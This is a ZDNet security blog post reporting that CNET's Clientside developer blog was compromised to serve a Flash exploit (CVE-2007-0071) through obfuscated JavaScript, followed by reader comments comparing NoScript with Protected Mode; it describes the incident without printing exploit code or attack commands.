CNET's Clientside developer blog serving Adobe Flash exploits

CNET's Clientside developer blog serving Adobe Flash exploits

Summary: Yesterday, Websense Labs issued an alert regarding a compromised CNET blog, namely the Clientside developer blog which has been embedded with a malicious javascript code attempting to exploit the visitors through a well known vulnerability in Adobe Flash's player. Websense's alert :"Websense Security Labs ThreatSeeker Network has discovered that a CNET Networks site has been compromised.

SHARE:
TOPICS: Security
5

Yesterday, Websense Labs issued an alert regarding a compromised CNET blog, namely the Clientside developer blogCNET Websense which has been embedded with a malicious javascript code attempting to exploit the visitors through a well known vulnerability in Adobe Flash's player. Websense's alert :

"Websense Security Labs ThreatSeeker Network has discovered that a CNET Networks site has been compromised. The main page of the CNET Clientside Developer Blog contains malicious JavaScript code that de-obfuscates into an iframe that loads its primary malicious payload from a different host. The malicious code is observed to exploit a known integer overflow vulnerability in Adobe Flash (CVE-2007-0071). At the time of this alert, the site is still hosting the malicious code. Visitors who are not patched against this vulnerability will be infected without any user interaction."

Interestingly, the second javascript obfuscation that they analyzed in the time of detection is different than the one I managed to obtain from a copy of the blog on the 2nd of August. And while it remains unknown for how long has the blog beed embedded with the javascript with the, this malware attack, and the rotating javascripts indicate a compromise compared to the massive SQL injections we're seeing on daily basis. The embedded javascript code appears to have been removed. Deobfuscating the obfuscated javascript code, attempts to access the live exploit URL from a .info domain that is now down. Historically, the same domain has been used in blackhat search engine optimization campaigns - yet another example of underground multitasking, namely, abusing a single domain for several different fraudulent purposes.

Blog javascript obfuscationThis malware attack should not be treated as an isolated event, it's the result of today's major risk-forwarding process, where legitimate sites are starting to serve malware and exploits with an unprecedented growth. Multiple vendors are confirming the trends, for instance, in its latest report, ScanSafe reports 407 percent increase in compromise of legitimate websites,  followed by Sophos, according to which a full 79% of malware-hosting Web sites are legitimate ones, and with Websense stating that more than 75 percent of the Web sites it classified as malicious were actually legitimate ones.

Slowly, but inevitably, the "do no visit unknown and potentially harmful sites" security tip is starting to lose its charm.

Topic: Security

Dancho Danchev

About Dancho Danchev

Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and cybercrime incident response.

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

5 comments
Log in or register to join the discussion
  • It's why Protected Mode (and AppArmor) are better than NoScript

    [i]Slowly, but inevitably, the "do no visit unknown and potentially harmful sites" security tip is starting to lose its charm.[/i]

    Don't get me wrong, I use NoScript but it fails this test. The instant you "trust" a site and turn on scripting, you could be vulnerable.

    NoScript is a good layer of defense but people are mistaken when they say that Firefox + NoScript is a security panacea. Come on Mozilla, Vista users need a Protected Mode capable Firefox.
    NonZealot
    • It's why Protected Mode (and AppArmor) are better than NoScript

      @NonZealot:

      Telling NoScript that you trust one site does not tell it to trust all scripts served through a site's Web page. If the script comes from a different server, you will be prompted to approve that, even if you have already approved the site hosting the page you've viewing.

      So even if a user would have automatically approved the malicious script on CNET, all subsequent scripts would have to be approved manually. Of course, I'll grant you that users might approve each script blindly, but NoScript doesn't make it easy to do that.

      I'm not arguing that NoScript would be the perfect solution, just pointing out that it doesn't work quite the way you describe.

      According to http://msdn.microsoft.com/en-us/library/bb250462.aspx:
      [i]The Windows Vista security infrastructure allows Protected Mode to provide Internet Explorer with the privileges needed to browse the Web while withholding privileges needed to silently install programs or modify sensitive system data.[/i]

      Seems to me that Firefox with NoScript meets that description, although it might be easier for the user to override the NoScript protection than the Protected Mode protection. But that override would take distinct effort on the part of the user, either by turning off NoScript or clicking on the Options button and allowing 101.202.303.404, for instance, to run a script.

      If I'm wrong about any of this, I'd love to discuss it.

      -- Tim
      TimothyMcGowan
      • You are correct, it depends on the circumstances

        [i]Telling NoScript that you trust one site does not tell it to trust all scripts served through a site's Web page.[/i]

        You are right. It would depend on if the javascript in question was linked from the trusted page (NoScript would block this) or if it was embedded into the page (NoScript wouldn't block it).

        [i]Seems to me that Firefox with NoScript meets that description[/i]

        This I disagree with. NoScript actually disables the javascript engine for untrusted sources so the javascript doesn't run at all. Protected Mode (and AppArmor) allow the javascript to run but with greatly reduced permissions. NoScript doesn't trust [b]any[/b] javascript, even if it is harmless. Protected Mode allows javascript to run but denies access to anything that the script shouldn't be messing with.

        The disadvantage of NoScript is that it stops even legitimate javascript from running. Protected Mode (and AppArmor) allows legitimate javascript to run. Both fail the scenario where you get attacked by a "trusted site" but because NoScript disables even legitimate javascript, you are much more likely to turn NoScript off than Protected Mode for a certain site.

        NoScript is like the gate of a gated community where there are no locks on the houses. Don't trust the mailman? Fine, you get no mail. Trust the mailman? Nothing stops him from walking into your house and stealing your stuff. Protected Mode is like a normal community. Anyone can put stuff in your mailbox but they can't get into your house.

        I'll continue to use NoScript even if Firefox gets Protected Mode since they both live quite happily together! People in gated communities can still lock their doors. :)
        NonZealot
  • RE: CNET's Clientside developer blog serving Adobe Flash exploits

    spybot just blocked a suspicous file from being downloaded from THIS page!
    Allesmachine
  • RE: CNET's Clientside developer blog serving Adobe Flash exploits

    Guess what guys. Your article on the Olympics breaking the internet is also seving them.
    Hates Idiots